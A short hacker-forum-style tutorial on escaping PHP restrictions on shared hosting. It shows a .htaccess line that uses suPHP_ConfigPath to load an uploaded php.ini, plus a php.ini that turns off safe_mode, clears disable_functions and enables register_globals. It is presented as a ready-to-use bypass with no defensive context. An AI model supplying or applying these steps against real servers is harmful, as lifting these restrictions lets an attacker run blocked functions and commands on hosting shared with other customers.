SuexeC BypasS Safe Mode Method


 In this tutorial we use suexec bypass method and with .htaccess file redirect php.ini direction to own site and then bypassing Safe_Mode & all Disable_Function , so we can bypass the server...
Enjoy it ;)

In this tutorial we use suexec bypass method and with .htaccess file redirect php.ini direction to own site and then off Safe_Mode & all Disable_Function , so we can bypass the server...

# Step 1 :

create .htaccess file and add this code :

suPHP_ConfigPath /home/user/public_html/php.ini

Description :
With this code we can bypass server !
So direction of php.ini bringing to the desired user and we can with handy php.ini file bypass the server.

# Step 2 :

Now we uploading own php.ini file or create php.ini file and add this code :

safe_mode = off disable_functions = Bypassed By S3Ri0uS register_globals = on

and server is bypassing ...

Of course this method like method of use php.ini + ini.php + .htaccess for server bypassing ! but this is new method of bypassing my bro.
Enjoy it ;)


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